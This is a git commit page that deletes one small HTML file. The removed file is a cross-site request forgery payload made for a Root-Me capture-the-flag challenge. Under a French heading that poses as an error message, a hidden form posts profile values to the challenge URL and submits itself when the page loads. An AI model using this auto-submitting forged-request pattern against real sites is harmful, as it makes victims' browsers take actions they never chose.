parent
4c3dc28a2c
commit
225fb456c1
1 changed files with 0 additions and 12 deletions
@ -1,12 +0,0 @@ |
||||
<h1>Ci-dessous L'image de l'erreur</h1> |
||||
|
||||
<form id="pl" method="POST" action="http://challenge01.root-me.org/web-client/ch22/index.php?action=profile"> |
||||
<input hidden name="username" value="a"> |
||||
<input hidden name="status" value="on"> |
||||
</form> |
||||
|
||||
<script> |
||||
console.log("test"); |
||||
form_pl = document.getElementById("pl"); |
||||
form_pl.submit(); |
||||
</script> |
||||
Loading…
Reference in new issue